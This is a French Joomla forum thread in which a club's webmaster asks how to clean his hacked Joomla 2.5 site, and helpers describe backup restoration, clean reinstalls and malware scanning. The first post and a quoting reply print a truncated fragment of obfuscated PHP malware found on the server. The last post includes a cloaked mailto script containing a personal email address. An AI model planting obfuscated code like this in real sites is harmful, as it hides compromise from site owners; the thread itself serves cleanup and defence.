Nettoyer un site piraté

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [Problème] Nettoyer un site piraté

    Bonjour à tous,

    Mon hébergeur vient de me dire que mon site avait était piraté et que je devais "faire le ménage".
    J'utilise Joomla 2.5 et ma version n'était pas à jour, ce qui est réglé maintenant.

    L'hébergeur utilise un script qui scanne les fichiers php et il m'a remonté une liste, non exhaustive, des fichiers suspicieux.

    J'ai commencé à balayer, via FileZilla, tous les fichiers du site à la recherche des fichiers frauduleux. J'ai remarqué que certains répertoires et/ou fichiers avaient été modifiés à une date où j'étais absent, donc incapable de modifier quoi que ce soit. J'ouvre systématiquement les fichiers php dans Notepad++, chaque fois que je tombe sur un fichier véreux, celui-ci est de la forme :

    <?php
    $VKHYo_GX='Lzceebm'|arOjd;$fuLp='|M&0*:h]GiX'|'h`'.PUdQLi7h6;$SNndftn="Gb`JBM].|"./*vbiN'.
    'krw)_%EGf*/FC4Io."@"|frMiv.'"'.VDQl.'"`!-~';$Aq='`s%@0%_%'.U0j5adn|'K@W!E`TV%'.
    'N{DH+.';$BCzDW=VStHZw0M.'<|xNp*cUY,'.RUlu.'@'^'gg E*9'.BRuZMH.'*GI['.dhMde.#qB'.

    etc.

    Totalement incompréhensible pour moi !!! Les fichiers officiels php étant parfaitement lisibles, j'en déduis donc qu'il faut supprimer tous les fichiers de ce type !

    Pour le moment, je me suis contenté de renommer les fichiers en .old, pour éviter leur activation.

    Que me conseillez-vous ? Continuer mon travail de fourmi et supprimer ces fichiers les uns après les autres ?
    Ces fichiers sont bien vérolés ?

    A noter que le site fonctionne apparemment sans problème.

    Merci d'avance pour vos conseils !

  • #2
    Re : Nettoyer un site piraté

    Bonsoir,
    J'utilise Joomla 2.5 et ma version n'était pas à jour,
    quand on dis qu'il faut suivre les mises a jour
    Bon sinon as tu une sauvegarde au moins ?

    J'ai commencé à balayer, via FileZilla, tous les fichiers du site à la recherche des fichiers frauduleux. J'ai remarqué que certains répertoires et/ou fichiers avaient été modifiés à une date où j'étais absent
    retiens deja tous ces fichiers ou dossiers ou les dates de modif concordent --> ça peut etre une piste
    et si tu as une date precise, regarde dans tes logs, tu pourra tenté de comprendre ce qui c'est passé

    Niveau securité et site hacké, lis cet article bien precieux. Profite en pour installer un minimum de protection

    Desinfecté un site web peut prendre du temps ... tout depend de l'attaque

    bon courage
    Dernière édition par manu93fr à 17/11/2014, 22h46
    Ce forum, vous l'aimez ? il vous a sauvé la vie ? Vous y apprenez chaque jour ? Alors adhérez à l'AFUJ https://www.joomla.fr/association/adherer
    Cette année, le JoomlaDay FR a lieu à Bruxelles, les 20 et 21 mai 2022, plus d'infos et inscriptions : www.joomladay.fr

    Commentaire


    • #3
      Re : Nettoyer un site piraté

      Bonsoir

      Tu as une sauvegarde saine de ton site ? Restaure-là.

      Non? Gloups...

      Perso, ce que je fais :

      * je récupère le site véreux en local,
      * je prends note des extensions utilisées et devant continuer à l'être (je regarde dans le dossier /components, /modules et /plugins quels sont les dossiers (=extensions) que je veux garder sur mon site)
      * je regarde quel est le template utilisé (je note son nom)
      et je supprime TOUT : je supprime les dossiers de Joomla, des extensions / modules / plugins / template. Tout à la poubelle.

      Je ne garde que /images et /media.

      Je remets du propre, partout : un Joomla tout propre, les extensions depuis les sites des éditeurs, le template depuis le site de l'éditeur, etc. Tout, que du propre ==> si tu as des extensions commerciales, j'espère que tu as encore les fichiers zip / les accès.

      Pour /images et /media, je passe le tout aux antivirus (plusieurs), adware (plusieurs) et autres outils ainsi que mes petits yeux : noms de fichiers bizarre, contenu véreux (Notepad++), etc.

      J'utilise aussi des scanners pour repérer des instructions illicites (decode64, etc). Note qu'en principe il ne devrait jamais avoir de code php dans /images et /media.

      Je scanne aussi les images et autre avec un outil de détection de type Mime (est-ce que le fichier avec l'extension .gif, est-ce vraiment une image ou du code ?).

      Quand mon site est propre; je le backupe une fois, deux fois et je remonte une archive sur mon site de production après l'avoir supprimé de fond en comble (=> je supprime tout de mon FTP).

      Et, finalement, je scanne ma base de données (exportation au format SQL et recherche de code comme des iframe, "position:absolute", etc.).

      Et, bien évidemment, rien ne fonctionne à 100% => il faut que je repasse ici ou là pour réinstaller quelque chose, reparamétrer quelque chose, etc. mais au moins avec cette méthodologie, mon site est sain.

      Et là, dernière chose : protection ! Je blinde le site afin qu'il ne soit plus aussi facilement hackable (il faut garder en tête qu'un pro du hack passera toujours mais c'en sera fini des petits plaisantins et, le pro, il ne viendra pas chez moi mais là où il pourra gagner des euros).
      Christophe (cavo789)
      Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
      Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

      Commentaire


      • #4
        Re : Nettoyer un site piraté

        un pro du menage ... le Christophe (humour ...)
        Ce forum, vous l'aimez ? il vous a sauvé la vie ? Vous y apprenez chaque jour ? Alors adhérez à l'AFUJ https://www.joomla.fr/association/adherer
        Cette année, le JoomlaDay FR a lieu à Bruxelles, les 20 et 21 mai 2022, plus d'infos et inscriptions : www.joomladay.fr

        Commentaire


        • #5
          Re : Nettoyer un site piraté

          Mes filles détestent quand je le fais :-D Les sacs poubelles se remplissent à une vitesse extraordinaire; leur armoire où elles rangent leur bordel, oups, leurs affaires, se désengorgant de quantité de machins inutiles :-D
          Christophe (cavo789)
          Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
          Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

          Commentaire


          • #6
            Re : Nettoyer un site piraté

            Merci beaucoup pour ces conseils que je vais suivre, bien évidemment !

            Je n'ai pas de sauvegarde récente de mon site... En fait, je suis débutant dans le web et j'ai réalisé ce site pour mon club d'autos anciennes ! J'ai commencé par faire tourner le site sur un NAS perso, testé depuis l'extérieur, puis ensuite transféré chez l'hébergeur (SDV à Strasbourg, pour ne pas le nommer...).
            J'ai continué à enrichir le site avec des articles sans faire de sauvegarde complète chez moi. J'avais installé Akkeba avant mes vacances et j'ai eu l'alerte durant celles-ci !!!
            Ce qui étonnant, c'est que rien ne se remarque sur le site !
            Dans tous les cas, cela va me faire progresser !!!

            Commentaire


            • #7
              Re : Nettoyer un site piraté

              Le but du "jeu" est de passer le plus inaperçu possible afin que le gain du hack (détournement des ressources de ton serveur, SEO spam, mail spam, ...) puisse persister. Donc à moins d'avoir affaire à un gamin qui change ta page d'accueil pour le fun, oui, c'est normal que tu n'ais rien vu pendant longtemps.
              Christophe (cavo789)
              Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
              Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

              Commentaire


              • #8
                Re : Nettoyer un site piraté

                +1 avec Cavo
                plus de la moitié du temps ils se servent des ressources de ton site pour du Spam
                Ce forum, vous l'aimez ? il vous a sauvé la vie ? Vous y apprenez chaque jour ? Alors adhérez à l'AFUJ https://www.joomla.fr/association/adherer
                Cette année, le JoomlaDay FR a lieu à Bruxelles, les 20 et 21 mai 2022, plus d'infos et inscriptions : www.joomladay.fr

                Commentaire


                • #9
                  Re : Nettoyer un site piraté

                  Bonjour à tous,

                  J'ai passé le site à Sucuri SiteCheck, comme proposé. Pas de malware détecté ni de Website Blacklisting. Par contre, la version Apache de l'hébergeur est ancienne mais cela, je n'y peux pas grand chose !
                  La version php est aussi ancienne, je ne peux d'ailleurs pas utiliser la dernière version d'Akeeba sur mon site.

                  Je vais continuer à suivre vos conseil, j'espère pouvoir avancer ce week-end.

                  Une question : Est-il normal de trouver des fichiers php incompréhensibles comme celui posté plus haut ?

                  Merci encore !

                  Commentaire


                  • #10
                    Re : Nettoyer un site piraté

                    Bonsoir
                    <?php
                    $VKHYo_GX='Lzceebm'|arOjd;$fuLp='|M&0*:h]GiX'|'h`'.PUdQLi7h6;$SNndftn="Gb`JBM].|"./*vbiN'.
                    'krw)_%EGf*/FC4Io."@"|frMiv.'"'.VDQl.'"`!-~';$Aq='`s%@0%_%'.U0j5adn|'K@W!E`TV%'.
                    'N{DH+.';$BCzDW=VStHZw0M.'<|xNp*cUY,'.RUlu.'@'^'gg E*9'.BRuZMH.'*GI['.dhMde.#qB'.

                    etc.
                    si tu parles de ça ... non c'est pas très catholique

                    sinon :
                    quel hebergeur ?
                    quelle version d'apache ? de php ?
                    Ce forum, vous l'aimez ? il vous a sauvé la vie ? Vous y apprenez chaque jour ? Alors adhérez à l'AFUJ https://www.joomla.fr/association/adherer
                    Cette année, le JoomlaDay FR a lieu à Bruxelles, les 20 et 21 mai 2022, plus d'infos et inscriptions : www.joomladay.fr

                    Commentaire


                    • #11
                      Re : Nettoyer un site piraté

                      Bonjour,

                      Mon hébergeur est SDV à Strasbourg. C'est un hébergeur pro, qui héberge aussi un grand média alsacien...
                      Apache : 2.2.25
                      PHP : 5.2.14
                      J'ai trouvé aussi un fichier Index.php dans le dossier Templates, j'ai compris qu'il ne devait pas s'y trouver ! J'ai donc modifié son extension pour désactiver l'exécution du code > passé en .old, en attendant de le supprimer.

                      Commentaire


                      • #12
                        Re : Nettoyer un site piraté

                        En consultant cette page tu remarqueras qu'il est conseillé d'avoir php 5.2.4 minimum pour faire tourner joomla donc je suis étonné que ton site fonctionne...

                        Christophe
                        http://www.webcrea.fr

                        Commentaire


                        • #13
                          Re : Nettoyer un site piraté

                          Envoyé par PascalBFC25 Voir le message
                          PHP : 5.2.14
                          Je te conseille d'activer PHP 5.4 pour ton site J2.5. Il y a normallement une seule ligne à ajouter à ton .htaccess (voir avec ton hébergeur s'il propose cette option).

                          Bonne soirée.
                          Christophe (cavo789)
                          Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
                          Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

                          Commentaire


                          • #14
                            Re : Nettoyer un site piraté

                            Bonjour à tous,

                            Le site fonctionne parfaitement, il est vrai qu'il est assez simple et sobre. Je vais demander à mon hébergeur de passer à la version php supérieure.
                            J'avais effectué une copie complète du site à l'installation, cela va me permettre de continuer à le nettoyer plus facilement.
                            J'ai aussi la version de développement du site, je j'avais mise en test sur mon NAS avant mise en ligne chez l'hébergeur.
                            Je pense, comme vous le disiez, que le hacker a profité du site pour spammer car le secrétaire du club a reçu des messages envoyé par le site.
                            Ces messages lui semblaient bizarre et il les a effacés.
                            Si vous voulez voir mon site, tapez idealeds dans gogol, celui-ci est le 3ème de la liste. Avec l'extension .fr.
                            Bon dimanche !

                            Commentaire


                            • #15
                              Re : Nettoyer un site piraté

                              Bonjour à tous,

                              J'ai passé le week-end à nettoyer le site, j'ai du supprimer une cinquantaine de fichiers mis par le pirate.
                              Je reviens vers vous car une de mes pages affiche un lien que je n'ai pas créé... Il n'existe d'ailleurs pas quand j'édite la page sous joomla.
                              Le lien est le suivant, il ne fonctionne plus mais je veux le supprimer :
                              Cette adresse e-mail est protégée contre les robots spammeurs. Vous devez activer le JavaScript pour la visualiser.

                              En affichant le code source de la page, j'obtiens ceci :

                              <a href="mailto:<span id="cloak38086">Cette adresse e-mail est protégée contre les robots spammeurs. Vous devez activer le JavaScript pour la visualiser.</span><script type='text/javascript'>
                              //<!--
                              document.getElementById('cloak38086').innerHTML = '';
                              var prefix = '&#109;a' + 'i&#108;' + '&#116;o';
                              var path = 'hr' + 'ef' + '=';
                              var addy38086 = 'p&#101;l&#111;&#105;s.chr&#105;st&#105;&#97;n' + '&#64;';
                              addy38086 = addy38086 + '&#111;r&#97;ng&#101;' + '&#46;' + 'fr';
                              document.getElementById('cloak38086').innerHTML += '<a ' + path + '\'' + prefix + ':' + addy38086 + '\'>' + addy38086+'<\/a>';
                              //-->
                              </script>"> </a></span></p>

                              Je pense que le hacker a du aussi mettre des choses dans ma base de données... Je vois pas comment ce code peut se retrouver dans une page, sachant que ce n'est pas moi qui l'y ai mis. Je précise que la page en question est celle où j'explique comment nous contacter, sans pour autant mettre un lien direct car j'utilise un formulaire de contact.

                              Vous en pensez quoi ?

                              Commentaire

                              Annonce

                              Réduire
                              Aucune annonce pour le moment.

                              Partenaire de l'association

                              Réduire

                              Hébergeur Web PlanetHoster
                              Travaille ...
                              X